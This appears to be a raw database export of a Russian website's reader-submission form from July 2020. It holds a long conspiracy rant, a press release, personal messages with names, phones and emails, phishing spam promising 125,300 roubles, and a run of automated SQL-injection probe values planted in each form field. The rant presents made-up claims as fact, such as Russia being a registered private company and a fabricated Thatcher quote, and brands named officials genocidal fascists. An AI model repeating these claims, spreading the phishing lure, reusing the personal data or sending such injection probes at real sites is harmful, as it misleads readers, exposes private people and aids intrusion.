Тот факт, что правила в современном мире устанавливает хозяин долларового печатного станка, сознательно игнорируется.
----
Задолго до появления российских реформаторов «железная леди» провернула в Великобритании излюбленный прием либеральных экономистов – ”в борьбе за радующие глаз цифры реальная экономика была подменена экономикой биржевых спекуляций”.
---
Если Вы печатаете мировые деньги, а другим разрешаете выпускать свои деньги только под покупку Ваших, то Вы управляете миром. Вы – главный и единственный кредитор! Страны, соглашающиеся на эти правила, становятся Вашими колониями, так как регулируете их кредитование. 
----
http://politobzor.net/show-40984-ceny-na-neft-obrushili-radi-spaseniya-dollara-ii-beseda-s-devidom.html 
Выдержка: Доллары, которые мы получаем от вас в обмен на наши бумажки, мы тут же запускаем на создание и поддержание враждебных по отношению к вам режимов в окружающих вас странах. Или ты думал, что это мы сами из своего кармана оплачиваем существование всех враждебных по отношению к вам стран? Нет конечно, это вы их оплачиваете, когда даете нам ваши заработанные деньги в долг. Мы берем деньги в долг у стран с сильной экономикой. И сразу даём эти деньги в долг под проценты, странам со слабой экономикой. Так как вернуть долги и проценты по ним, страны со слабой экономикой не могут, они вынуждены расплачиваться с нами натурой. То есть, своим внешнеполитическим курсом. Которым, по сути руководим и управляем мы так, как нам хочется. Даже если в любой из этих стран, к власти придет честный и порядочный патриот своей страны и народа, он ничего не сможет изменить. Как только он не выполнит наших требований, мы потребуем от этой страны погасить долги немедленно. И голодный народ этой страны, под нашим чутким руководством, сам свергнет и повесит своего честного народного патриота. Или же в этой стране начнется гражданская война. Точно такая же гражданская война, как мы организовали недавно в Ливии и теперь в Сирии, Украине....

***
Vitael' 
Поэтому, угроза НАТО, Украинская ЖУТЬ, вся эта шумиха с санкциями, это всё флуд, пустой трёп, большая ""ДЕЗА"" чтобы увести внимание людей в сторону от истинной причины. Подменой понятий переводят обсуждение в нужное для заокеанских хозяев направление. 

На фоне ""противоборства добропорядочной России в лице Путина с Мировым агрессором США, в лице Обамы"", а ныне Трампа, под шумок про ""открытость от некой изоляции"", идёт прихватизация - РАСПРОДАЖА России 
http://www.youtube.com/watch?v=DRsZ0V6uvM0 
https://www.youtube.com/watch?v=u5Ydnupcn2Y

Справка: 
Приватизация - ЗАХВАТ ЗЕМЕЛЬНЫХ ТЕРРИТОРИЙ, ПРИРОДНЫХ БОГАТСТВ, ЭНЕРГОРЕСУРСОВ СТРАНЫ, а, так же ПОРАБОЩЕНИЕ, ИСТРЕБЛЕНИЕ НАСЕЛЕНИЯ 
без КРОВОПРОЛИТИЯ и РАЗРУШЕНИЯ КОММУНИКАЦИЙ. 
http://newsland.com/news/detail/id/1112243/ 
----
Vitael’ 
Если не огнём, мечом и стрелами, так ядрами и мушкетами, но 
зачем насиловать, грабить, убивать, чтобы завоевать кого-то, ПОРАБОТИТЬ. 
Зачем разорять, жечь, крушить пушками и ракетами? 
Если можно ""бумажкой – фантиком"" обратить к себе в ЗАВИСИМОСТЬ. https://www.youtube.com/watch?v=B25ubqFvdI4 
https://elhow.ru/images/extra_articles/0/1/145/inner/8.jpg
---
Не ружьём, так рублём. 	
Не ракетой, так монетой. 
Не танками, так банками, 
он пришёл, чтобы ГРАБИТЬ, НАСИЛОВАТЬ, ПОРАБОЩАТЬ. 
https://www.youtube.com/watch?v=Tn7J6xpVJaE 
https://www.youtube.com/watch?v=z1XVSZhHThU 
https://www.youtube.com/watch?v=JvOljXG7uAI 
http://ic.pics.livejournal.com/semigor33/35422838/54609/54609_900.jpg 
https://www.youtube.com/watch?v=zkDdWmL5q_c
---
Частному инвестору как:
- Иисусу, земной плоти бога,
- инквизитору ереси,
- опричнику царя,
- «ССовцу» фюрера фашизма, даны все привилегии и оказаны все почести.
-----
Теперь этого захватчика – прихватизатора, грабителя «инвестора», фашиста – поработителя, надо беречь. Не уничтожать его, не сопротивляться его насилию, а, толерантно холить за это и лелеять. 
Вот как эта Путинская шобла мародёров извратили суть бытия, ЖИЗНЬ.

***
И если по Миру, английской матрицей морально-нравственного воспитания “высокомерного образования” вершит Америка “воинственно-демократично” в лице Обамы, а ныне Трампа, то Москва, сподручно с Питером в лице Путина, всё той же матрицей, но, ""тихой сапой - мягкой силы"", суверенно - лично. 
----
Матрица капитализма одна, это доллар и различные его кредитные дублёры. 
Не доллар, так амеро или введут электронную единицу (чип - Emercoin), но, это будет ""актив"" обеспечивающий инвесторам доходы. А суть «экономики» останется прежней, это увеличение богатства в одних странах, за счёт разорения, разграбления, порабощения, других. Обогащение ""хозяев макулатуры"" 
https://www.youtube.com/watch?v=HZ5ZiJU422I&list=PL1SIOSezjmt2eF7T0TLIQZ9Z9L4kv0LtZ 
за счёт природных и человеческих ресурсов. Это дармовая нажива экономистов-финансистов за счёт чужого разума, за счёт чужого труда. Это тоталитарное ПОРАБОЩЕНИЕ.
 
***
Справка: 
РАБСТВО - институализированное господство над людьми. Грубая форма эксплуатации человека, при которой раб, наряду с орудиями производства, является живым рабочим имуществом и коммерческим товаром инвестора-рабовладельца, кредитора.

***
Кредитно-денежная политика, проводимая Путиным от имени ""государства"", это и есть рабовладельческий строй, феодализм, татар-монгольское ИГО, польская шляхта, царская барщина, колониальный расизм, фашистская оккупация одновременно и ""в одной упаковке - ПОРАБОЩЕНИЕ"". https://newsland.com/static/u/comment_image_from_text/30122017/92369355-3022790.jpg 
----
В отличии от татар-монгольского ИГА, где ""дань"" - золотом, серебром, пушниной, а, так же наложницами и рабами преподносилась ханам от славянских князей в качестве даров в повиновении, этот параноидальный гнёт, называемый ""экономикой"", будет носить только насильственный, понуждающий к самоистязанию, самоуничтожению, суицидальный характер. 
Это финансовый террор банкирского синдиката: 
http://newsland.com/news/detail/id/1322882/  
http://genocid.net/news_content.php?id=2442
----
Земли, как России, так и Украины, а, также что в ней, давно уже проданы, поэтому жители стран находятся на чужой территории. После перестройки, разделения властей, приватизации, различных реформ и децентрализации власти, они не НАРОД СТРАНЫ, а: 
- население территорий, 
- подданные удельных княжеств, 
- холопы боярщины, 
- крепостное быдло феодалов, 
- рабы колонистов. 
-------
Справка: 	
по D&B D-U-N-S® Number: ООО Правительство ""РФ"": 531298725 
Юридическое лицо ""РФ"" (РОССИЙСКАЯ ФЕДЕРАЦИЯ) - официально зарегистрировано в мировом реестре юридических лиц, как частная коммерческая организация. Исполнительным директором фирмы является гражданин СССР Медведев Д. А. https://www.youtube.com/watch?v=jiatHviAgtM
-----
https://www.upik.de/en/upik_suche.cgi?new=1 - официальный ресурс юридических лиц. https://www.youtube.com/watch?v=TUaY48XskrM&t=31s
https://www.youtube.com/watch?v=q2NqYo2lnnQ	
---
То есть, частная коммерческая организация ""РОССИЙСКАЯ ФЕДЕРАЦИЯ"" возглавляемая коллаборационистом Медведевым Д.А, сделала граждан СССР,  их земли, жизнеобеспечивающие ресурсы, жильё, своим коммерческим имуществом дающее им и прочим инвесторам доходы. Людей обратили в товар…
https://www.youtube.com/watch?v=oJ5pm-7LlDY
https://www.youtube.com/watch?v=gi-LUZMfb90
----
Самый настоящий фашист, пусть даже лично никогда не носил черную форму с руническими буквами ϟϟ, дорвавшегося до власти, уже не будет считаться ни с каким народом, и ни с какими вашими правами Фашист по факту происходящего, по самой сути занимаемой позиции очень быстро употребит этот народ для своих личных нужд,
------
Майские указы Путина от 7 мая 2012 г. N 596 предписывают; 
=увеличение объема инвестиций не менее чем до 25% внутреннего валового продукта к 2015 году и до 27% - к 2018 году= 

Справка:
Инвестиции, это «денежные вложения», то есть, покупка за деньги, как движимого, так и недвижимого имущества, а, так же различных «ценных бумаг» с целью извлечения с того доходов, прибылей. 
----
Все инвесторы в Россию, то есть, те, кто купил Россию, должны получать доходы с россии. 
За один вложенный $ доллар МЫ – НАРОД  СТРАНЫ  ДОЛЖНЫ  ОТДАТЬ  25$, поэтому, при привлечении инвестиционных капиталов на миллионы $, отток составляет миллиарды $.
- ну, а, обложенное данью, население страны, нищает, ибо, при повышении цены кредитной валюты, автоматически цена повышается на всё. 
Рубль укрепляется, а народ  нищает - https://newsland.com/static/u/comment_image_from_text/22022017/86557287-1566206.jpg
----
Население страны, в назначенной ФРС ""конкуренции"", должно РАБствовать. Заниматься самобичеванием, садомазохизмом, самоистязанием, чтобы обеспечивать доходность различных ""Ц-бумажек"". Дармовую наживу их инвесторам, то есть, «РОСТ экономики».
-----
Банкиры-кредиторы, инвесторы-акционеры, адепты секты ""ОАО"", гос ублюдки различных мастей должны получать доходы, а, МЫ - НАРОД, ДОЛЖНЫ ОБЕСПЕЧИВАТЬ не только свою страну реальными материальными благами, но и доходность их кредитной макулатуры, вернее, дармовую наживу их инвесторов. 
МЫ - НАРОД ДОЛЖНЫ быть работоспособными налогоплательщиками. 
МЫ - НАРОД ДОЛЖНЫ быть кредитоплатёжными законопослушными РАБАМИ. 
---
МЫ не граждане России, а, 
обезличенный товар, имущество – быдло. 
Дешёвая «РАБсила» для инвестора-банкира.

***
И чтобы этим «святошам – ДЕГЕНЕРАТАМ ФАШИСТКОЙ КЛЕПТОКРАТИИ», жилось свободно сытно и вульгарно, мы, население страны ДОЛЖНЫ воевать меж собой за «РАБочее место», - http://vk.com/note56679806_12307837 - грызть друг друга, за своё выживание. 
-------
Сегодняшние захватчики-прихватизароры природных энергоресурсов, природных богатств страны, банкиры, адепты секты ""ОАО"", «государи - фискалы», похуже немецко-фашистских захватчиков будут. Если те, для освобождения себе жизненного пространства просто убивали или сжигали людей, то эти - сегодняшние ""хозяева человеческих ресурсов"" для своего безмерного, абсолютного господства над Миром, своим ""человеколюбием"" понуждают людей заниматься самобичеванием, самоуничтожением в обеспечении доходности бумажек - фантиков, дающих им дармовую наживу.
ВСЕ БУДУЩИЕ ПОКОЛЕНИЯ России ОБРЕЧЕНЫ, быть у них РАБАМИ.
-------
Теперь не культура народа, а ""финансовая культура"".
Не история страны, а ""кредитная история"".
Не суверенитет страны, а суверенный долг.
http://www.youtube.com/watch?v=Jd59yIVRLkU  
------
Из всех ""ПРАВ"", НАРОДУ остаётся лишь одно, это право на кредит.
Если ты не оденешь на себя это ""ЯРМО"", на тебя его оденут сверху
http://newsland.com/news/detail/id/1379831/   
----
А, библия еврейская гласит; - ""РАБОМ становится ДОЛЖНИК"".
-----
Путинская шобла мародёров либеральной расы, 
возомнившая себя сверхбожественной Мировой материей 
живёт на халяву, за чужой счёт. 
На дармовщину, за счёт чужого разума. 
За счёт чужого труда - рабства. 
За счёт чужого имущества. 
От поборов, разбоя, грабежа, порабощения. 
Она жирует за счёт жизни чужого физиологического тела. 
Эта РАКОВАЯ ОПУХОЛЬ теле человека. 
И эта РАКОВАЯ ОПУХОЛЬ УНИЧТОЖАЕТ ЧЕЛОВЕЧЕСТВО.
-----
Уменьшение пенсионного возраста, вернее, 
увеличение предпенсионного срока рабской повинности, 
это и есть ОТКРЫТЫЙ ГЕНОЦИД НАРОДА.
------
Справка: 
Геноци́д (от греч. γένος — род, племя и лат. caedo — убиваю) — действия, совершаемые с намерением уничтожить, полностью или частично, какую-либо национальную, этническую, расовую, религиозную или иную исторически сложившуюся культурно-этническую группу как таковую путём. Геноцид признан международным преступлением. (ст. 357 УК “РФ”), а по законам СССР, это ст. 64 УК РСФСР. 
-----
«Целесообразно проживание на территории России 15 млн. человек». М.Тетчер. 
https://www.youtube.com/watch?v=G0oRe_XHczw
----
http://newsland.com/news/detail/id/1510645/ - Якунин процитировал первого президента Европейского банка реконструкции и развития, члена Бильдербергского клуба Жака Аттали: «В грядущем новом мировом порядке будут побежденные и победители. Число побежденных, конечно, превысит число победителей. Они будут стремиться получить шанс на достойную жизнь, но им, скорее всего, такого шанса не представят».
-----
Vitael’
И закончится человечество истуканами, как на острове Пасхи - http://www.airpano.ru/360Degree-VirtualTour.php?3D=Easter-Island - долбоёбами смотрящими в небесную даль в надежде на то, что кто-то подарит им жизнь, которую они извели, обратив свою живую сущность в предмет. (камень, медяк, бумажку, пластик, чип, Emercoin). 
https://www.youtube.com/watch?v=5J4pThFOYic 
https://www.youtube.com/watch?v=cMTnGC1iB5I
---
И это не ""из пальца высосанное предписание""...
этот ПРИГОВОР человечеству вынес РОСТОВЩИК.
https://www.youtube.com/watch?v=YLdfSR92H9s - Война на уничтожение. 
https://www.youtube.com/watch?v=ICAaN2tzYTk  
https://www.youtube.com/watch?v=a2BRiPcUtaQ  
https://www.youtube.com/watch?v=5J4pThFOYic
https://www.youtube.com/watch?v=A2rY8-H8nDk
-----
Одухотворив предмет; деньги - вложения работают, умный гаджет, умный чайник, умный дом, умный город, они обезличили саму ЖИВУЮ СУЩНОСТЬ - ЧЕЛОВЕКА, обратив его в предмет; «физлицо, юрлицо, андроид робот, электронное правительство». 
-----
Создав иллюзию и уверовав в неё, они обрекли себя и всё человечество на самоуничтожение. 
https://www.youtube.com/watch?v=oWOgEtuHx7U 
https://www.youtube.com/watch?v=cwO3c-_UI-w 
https://www.youtube.com/watch?v=No0fTGRPg-A 
https://www.youtube.com/watch?v=codueDHYv04 
https://zen.yandex.ru/media/doktorhi/chto-i-trebovalos-dokazat-5e993aba0efdc606e641a183

***
Справка: 
ПОРАБОЩЕНИЕ - обращение, как физическое, так юридическое в рабство, согласно Конвенции подписанной в Женеве 25.09.1926г, является одним из преступлений против человечества. И срока давности не имеет. 
Потому, что физическое усилие - действие, деяние, работа, труд, это неотъемлемый, основополагающий фактор жизнедеятельности, это прямая ОБЯЗАННОСТЬ любого существа живого, а, не кем-то дарёное право. 
Любой цивилизованный суд устанавливающий истину, ввиду физического непричастия к содеянному освобождает от какого-либо силового воздействия, законом притязания. 
Так как никто не может быть осужденным, униженным, уничтоженным за то злодеяние, которого он не совершал. 
Так же никто не может присваивать себе в благодетель, то, к чему он физически непричастен. 
Поэтому “акционер” не может присваивать себе в «собственность» то, чего он не создавал. 
Взимать «доход» с того, к чему он физически не причастен. По той простой причине, что 
не твоими душой, умом и телом, не твоими руками сработано. 
Не тобой создано, ни тебе что-либо с этого иметь. 
Не возгордись ублюдок тем, чего не совершал. 
Не возомни себя кумиром, фюрером, вождём, 
богом или неким сверхсуществом. Ибо, 
без духовного побуждения, умственного интеллекта, физического усилия, труда, работы, 
деяния по преобразованию, нет предмета притязания. 
= Без ФАКТА СВЕРШЕНИЯ, нет объекта вожделения = 
Кто не создаёт, тот не имеет. Кто не учится, тот не умеет. 
Не вкусив, не ощутив, невозможно вкус постичь. 
НЕ ДЕЛАННОЕ ЕСТЬ?! - ТАКОГО БЫТЬ НЕ МОЖЕТ. 
Равно, как не будет оваций - ""Г О Л"", без забитого мяча (шайбы) в ворота. 
Равно, как рекорд принадлежит спортсмену. 
Равно, как произведение принадлежит автору. 
Равно, как подвиг принадлежит герою. 

= ПО ДЕЛАМ ВОЗДАЁТСЯ = 

ЖИЗНЬ, есть процесс созидания, ибо, самоуничтожением заниматься никто не будет. Это противоестественно. Самобичевание противоречит здравому рассудку – инстинкту выживания. 

Но, когда РАЗУМ – побуждающий физическое усилие – действие, а, деяние, работа, труд однозначны.
Когда РАЗУМ, побуждающий ваш ТРУД Властей, направлен не на созидание - создание реальных материальных благ, физических ценностей. Не в благодетель, для удовлетворения своих физических потребностей, а на ОТЪЁМ у других, на ОТЧУЖДЕНИЕ у других, на РАЗОРЕНИЕ других для своего частного потреблятства, то, 
это и есть ВЫМОГАТЕЛЬСТВО, ГРАБЁЖ, РАЗБОЙ, ПИРАТСТВО, РЭКЕТ, РОСТОВЩИЧЕСТВО, МАРОДЁРСТВО, БАНДИТИЗМ, КЛЕПТОКРАТИЯ. 
Это и есть ТИРАНИЯ - физическое понуждение к рабской повинности – ДЕСПОТИЗМ, ТЕРРОРИЗМ.
Это и есть ЭКСТРЕМИЗМ, ШОВИНИЗМ, ФАШИЗМ, ПОРАБОЩЕНИЕ. 
------
Создание ""инвестиционного климата"", это и есть создание марионеточным правлением россейской сырьевой резервации – ХУНТОЙ, условий, понуждающих население к себяпродаже по дешёвке в РАБСКОЕ ПОВИНОВЕНИЕ к инвестору в РАБОВЛАДЕНИЕ. 
https://www.youtube.com/watch?v=uuueRw0EQ38 

Поэтому Ельцин, Чубайс, Путин, Медведев, Кудрин, Шувалов, Греф, Костин, Улюкаев, 
Потанин, Прохоров, Дворкович, Игнатьев, Сторчак, Ротенберги, Кох, Шохин, Фурсенко, Набиуллина, Вексельберг, Тимченко, Ковальчук, Кириенко, Сечин, Силуанов, Миллер, Марков, Матвиенко, Мишустин, Якунин, Яровая, Агаларов, Усманов, Ролдугин, Абрамович, Фридман, Фрадков, Зубков, Задорнов, Уринсон, Ясин, Швыдкой, Нарышкин, Назарбаев, Дерипаска, Мутко и эта банда реформаторов, что сегодня узурпировали власть в России, обвиняется в расизме, нацизме, шовинизме, экстремизме, бандитизме, фашизме, ростовщичестве, клептократии, терроризме, порабощении, геноциде, то есть, в преступлениях против не только человечности в частности, но, и всего человечества в целом. 
------
А, так же в создании ""инвестиционного климата"" понуждающего в рабской повинности заниматься мазохизмом, самоистязанием, самобичеванием, самоуничтожением, в каторжных трудах для обеспечения доходности различных ""Ц-бумажек"", пластика и прочеё ХРЕНИ, вернее, дармовой наживы их инвесторам-приобретателям. 
-----
Справка: 
Преступление против человечества, и преступление против человечности, это однородные по сути, но разные по объёму (масштабу) понятия. Иногда люди их путают, даже на телевидении. Надо понять, что ""человечность"" - это положительные человеческие качества, присущие каждому. Доброта, скромность, порядочность. Она проявляется в стремлении помочь, любви к человеку, уважении к нему. А ""человечество"" - это все люди на земле, человеческое сообщество.
Так, преступления против человечности - это преступления, которые наносят вред человеку - здоровью, благосостоянию, чести. Они принадлежат к криминальным и караются законом. Это убийство, доведение до самоубийства, побои, пытки, неоказание помощи лицу в опасности, незаконное лишение свободы, захват заложников, торговля людьми, эксплуатация детей, изнасилование, развращение несовершеннолетних.
	
Преступления против человечества несут угрозу не конкретному человеку, а человеческому сообществу, окружающей среде, нарушают правила человеческой совместной жизни. Они наказываются не только законами данной страны, но и международным законодательством. Это пропаганда войны, планирование и ведение войны, применения оружия массового уничтожения, пиратство, хулиганство на улице, надругательство над могилой, жестокое обращение с животными, загрязнение окружающей среды, создание преступной организации, бандитизм, террористический акт"".
Преступления против человечности и преступления против человечества взаимосвязаны. 
Преступления против человечества является одновременно преступлениями против человечности. 
-----
Повторяю, 
вся эта Путинская шобла мародёров либеральной расы, 
возомнившая себя сверхбожественной Мировой материей 
живёт на халяву, за чужой счёт. 
На дармовщину, за счёт чужого разума. 
За счёт чужого труда - рабства. 
За счёт чужого имущества. 
От поборов, разбоя, грабежа, порабощения. 
Она жирует за счёт жизни чужого физиологического тела. 
Эта РАКОВАЯ ОПУХОЛЬ в теле человека. 

И эта РАКОВАЯ ОПУХОЛЬ УНИЧТОЖАЕТ ЧЕЛОВЕЧЕСТВО.
https://www.youtube.com/watch?v=5MtVG8eXxfg 
https://www.youtube.com/watch?v=wHRgLm9TAlY 
https://www.youtube.com/watch?v=VNFGJKAmTDs  - транс гуманизм.
-----
Путин со своей шоблой ДЕГЕНЕРАТОВ ФАШИСТКОЙ КЛЕПТОКРАТИИ обвиняется в: РАСИЗМЕ, НАЦИЗМЕ, ШОВИНИЗМЕ, ЭКСТРЕМИЗМЕ, ФАШИЗМЕ, БАНДИТИЗМЕ, РОСТОВЩИЧЕСТВЕ, КЛЕПТОКРАТИИ, ПОРАБОЩЕНИИ, ТЕРРОРИЗМЕ, ГЕНОЦИДЕ, 
то есть, они обвиняются в преступлениях против человечества.
-----
И всякое умалчиваемые, всякое сокрытие, извращение политтехнологами, всякое препятствие распространению этой информации об их преступлениях против человечества, расценивается только как соучастие в оных. 
-----
ВСЕМ БЕДАМ НА ЗЕМЛЕ ПРИЧИНА, 
это РОСТОВЩИЧЕСТВО и ДАРМОВЩИНА 
https://www.youtube.com/watch?v=dJY4MeMWPbg
",null,"2020-07-12 15:58:39",0,a3d997e10a2e125e9a7a413a43b56f95,1542712948
507,Ivan,"89003313179",pr-dpr@yandex.ru,Alegria: Спрос россиян на испанскую недвижимость увеличился  за время карантина в два раза,"Alegria: Спрос россиян на испанскую недвижимость увеличился
 за время карантина в два раза
Спрос на испанскую недвижимость среди россиян увеличился в два раза, - заявили в компании «Alegria», ведущем агентстве недвижимости и девелопере на побережье Коста-Бланка Испании, 21 июня открывшей свои границы после карантина. Так за последние три месяца в компанию для покупки жилья обратились свыше 1,7 тыс. россиян. Это почти вдвое больше, чем за аналогичный период прошлого года. Еще примерно столько же жителей России выразили интерес к ее услугам по переезду в Испанию на ПМЖ.
Также изменилась и структура спроса россиян на испанскую недвижимость. Если раньше покупатели с достатком выше среднего приобретали квартиры и виллы для временного проживания: приезжали по туристической визе на срок до 3 месяцев, а остальное время сдавали их в аренду. То сейчас свыше половины всех обращений наших соотечественников в «Alegria» связаны с переездом на ПМЖ. Сейчас их интересует преимущественно бюджетная (от €20-30 тыс.) и недвижимость среднего класса (€70-100 тыс.) в районах со всей необходимой инфраструктурой для ПМЖ (близость к школам, торговым центрам и пр.). Также возрос интерес к домам с участками, в том числе и в сельской местности.
Изменилась и внутрирегиональная география предпочтений россиян: теперь они выбирают недвижимость в Аликанте, где инфраструктура и перспективы развития бизнеса и трудоустройства лучше, чем в других городах региона.
Наши соотечественники также активно бронируют через компанию апартаменты для отдыха на август-сентябрь 2020. 
Чтобы удовлетворить растущий спрос, «Alegria» вдвое увеличила свое присутствие в регионе. Сейчас ее недвижимость можно арендовать или приобрести в восьми офисах продаж, расположенных в ведущих городах побережья – Кальпе, Бенидорме, Торревьехе, Аликанте и Валенсии. Своим клиентам девелопер предлагает на выбор свыше 1,6 тыс. объектов недвижимости.
«Мы понимаем, что увеличение запросов в нашу компанию со стороны российского покупателя – это не только маркетинговые усилия, который мы применяли до и во время кризиса, но и объективное отражение растущей популярности испанской недвижимости в кризисных условиях. Тем более, что в текущем году в отдельных регионах мы наблюдаем снижение цен в результате местной и глобальной макроэкономической ситуации”, - подчеркнул генеральный директор и владелец компании Ян Вайнрух. - Мы трезво оцениваем ситуацию на рынке и в нынешнем году планируем придерживаться консервативной стратегии роста. Конечно, мы еще будем открывать новые офисы, но главный акцент теперь будет сделан на повышении эффективности услуг в уже существующих точках продаж».
","","2020-07-15 11:37:32",92575,"78cdd31eca17d1b8bc452a84c83aa911",1410396829
508,Лилия ,"",ml901@mail.ru,Снижение НДС в Германии в Рамках стимулирования спроса на товары,"Добрый день,  уважаемая редакция БО 
возможно, читателям Вашего издания будет интересна новость о снижении НДС в Германии:

На шесть месяцев, с 1 июля по 31 декабря 2020 года, в Германии снижается налог на добавленную стоимость (НДС). Регулярная ставка составит 16% вместо обычных 19%, льготная - 5% вместо 7%. В данном случае государство отказывается от налоговых поступлений примерно в 20 млрд евро.

Магазины сразу откликнулись массовым снижением  цен (конечно,  небольшим - около 2-2,5%) и красными ценникам. 

ссылка на официальный источник:

https://www.bundesregierung.de/breg-de/aktuelles/faq-mehrwertsteuersenkung-1764364

С уважением,  Лилия Хойслер.","","2020-07-15 15:53:22",0,b81044073e22c38b4327cc930bb621bf,3646673163
509,Ришат,"8553320414",riszhat@yandex.ru,"",Просьба о помощи. Хотел помочь людям с лечением covid-19 взамен на моё лечение. Я болею двумя редкими внутренними неизлечимыми заболеваниями. Лечение этих болезней находится на стадии эксперимента. По второй болезни скоро не смогу ходить,"","2020-07-16 09:07:32",0,cb0885067422153d6826e91bb2e94529,1533763980
510,"","","","«ЛЮДЕЙ ОТПРАВЛЯЮТ ЛЕЧИТЬСЯ ДОМОЙ, ПОКА ОНИ НЕ ПЕРЕСТАЮТ ДЫШАТЬ»: ДЕПУТАТ «ПРОЗРЕЛА» ПОСЛЕ СМЕРТИ СЫНА ОТ КОРОНАВИРУСА И РАССКАЗАЛА О ПЛАЧЕВНОМ СОСТОЯНИИ МЕДИЦИНЫ В НОРИЛЬСКЕ",http://www.evening-kazan.ru/news/lyudey-otpravlyayut-lechitsya-domoy-poka-oni-ne-perestayut-dyshat-deputat-prozrela-posle-smerti-syna-ot-koronavirusa-i.html,"","2020-07-16 09:28:34",0,f447dc97a1b9cb58c7766c0508a5519d,3000365069
511,mamuka,+995577779696,keti.goginashvili@gmail.com,"","dobri veche..r skolko stoit na mashine lexus gs 350 2013 goda chorni tonirovka i skolka procent maxsimali tiomnosti budet? ia jivu gruziu i xachu polni komplekt v zbore tolko perednie steklo... moi druzia kazane vjivut ani otpravliaet...
","","2020-07-17 02:39:29",0,e7eaff27f3fd5b9cb5d6dfb307b20f1c,3560601932
512,Рустем,"","",интересная статистика по переболевшими,"https://www.invitro.ru/l/invitro_monitor/

по ссылке видно, что в казани переболело 10%, а в челнах целых 30!!!","","2020-07-17 13:14:39",0,bd5a9a101830a45ea848962807194d93,2999885668
513,"9L6NQU77E ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1","9L6NQU77E ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1",serga.sultanov.78@mail.ru,"9L6NQU77E ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1","9L6NQU77E ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1","","2020-07-17 13:25:34",0,"09a7ec65976ba8e2378e80f5909e63d6",1579758029
514,SKJ5QSL26B4Y ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1,SKJ5QSL26B4Y ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1,serga.sultanov.78@mail.ru,SKJ5QSL26B4Y ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1,SKJ5QSL26B4Y ВЫ ПОЛУЧИЛИ 125300 РУБ ЖМИТЕ ДЛЯ ПОЛУЧЕНИЯ HIER www.yandex.ru/1,"","2020-07-17 23:25:39",0,"0da5c3f542ef3fe4fded6b012c8a42ea",1579758029
515,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:31",0,"1",760341454
516,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:37",0,"1",760341454
517,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:38",0,"1",760341454
518,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:40",0,"1",760341454
519,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:41",0,"1",760341454
520,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:42",0,"1",760341454
521,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:43",0,"1",760341454
522,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:46",0,"1",760341454
523,JCfUZQsq,"555-666-0606","1'""",Mr.,"555","1","2020-07-18 01:23:46",0,"1",760341454
524,JCfUZQsq,"555-666-0606",\,Mr.,"555","1","2020-07-18 01:23:47",0,"1",760341454
525,JCfUZQsq,"555-666-0606",@@wV9Ib,Mr.,"555","1","2020-07-18 01:23:49",0,"1",760341454
526,JCfUZQsq,"555-666-0606",JyI=,Mr.,"555","1","2020-07-18 01:23:51",0,"1",760341454
527,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:56",0,"1",760341454
528,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:58",0,"1",760341454
529,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:23:59",0,"1",760341454
530,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:00",0,"1",760341454
531,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:01",0,"1",760341454
532,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:02",0,"1",760341454
533,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:02",0,"1",760341454
534,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1'""","2020-07-18 01:24:04",0,"1",760341454
535,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",\,"2020-07-18 01:24:04",0,"1",760341454
536,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",@@HzXwm,"2020-07-18 01:24:07",0,"1",760341454
537,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",JyI=,"2020-07-18 01:24:11",0,"1",760341454
538,"1'""","555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:12",0,"1",760341454
539,\,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:13",0,"1",760341454
540,@@f8HnV,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:15",0,"1",760341454
541,JyI=,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:18",0,"1",760341454
542,JCfUZQsq,"1'""",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:23",0,"1",760341454
543,JCfUZQsq,\,sample@email.tst,Mr.,"555","1","2020-07-18 01:24:25",0,"1",760341454
544,JCfUZQsq,@@PKFuo,sample@email.tst,Mr.,"555","1","2020-07-18 01:24:28",0,"1",760341454
545,JCfUZQsq,JyI=,sample@email.tst,Mr.,"555","1","2020-07-18 01:24:29",0,"1",760341454
